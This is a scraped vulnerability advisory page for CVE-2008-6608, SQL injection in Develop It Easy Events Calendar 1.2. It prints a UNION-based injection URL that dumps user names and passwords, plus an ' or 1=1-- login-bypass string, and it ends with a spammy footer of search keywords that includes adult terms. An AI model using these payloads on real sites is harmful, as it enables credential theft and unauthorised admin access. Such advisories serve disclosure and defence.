about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities


Title Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
Published 2008-11-06-12:00AM
Updated 2009-04-15-08:26PM
Class Input Validation Error
CVE   CVE-2008-6608
Remote  Yes
Local  No
Credit  Cyb3r-1sT
Vulnerable  Develop It Easy Events Calendar 1.2
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proofs of concept are available:http://www.example.com/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
http://www.example.com/admin/index.php

user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 01:39:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
web deface saniy www.zoowu. Main sek www.trish smf 1.4.4 Blacmen po www.xvideo webex MULHERES P www.gz1830 Madogg vid phpbb shel perl scan php-nuke 2 www.nmeili Internet MMs of kar php-nuke 2 www.xvideo freee chat blog.sina. animal se 200 /compo MICROSOFT www.sexetv com_jcs%2F t276t Windows pr 200 /compo Lura only sex 200 /compo www.sexetv WWW.telugu Xxx Pictur icamtech.c Look movie hp LaserJe news for c IMGallery www.it197. www.80845. Search XXX VIDIO 22sex Nudebabes. Photo ayu Live anima cmd.gif?cm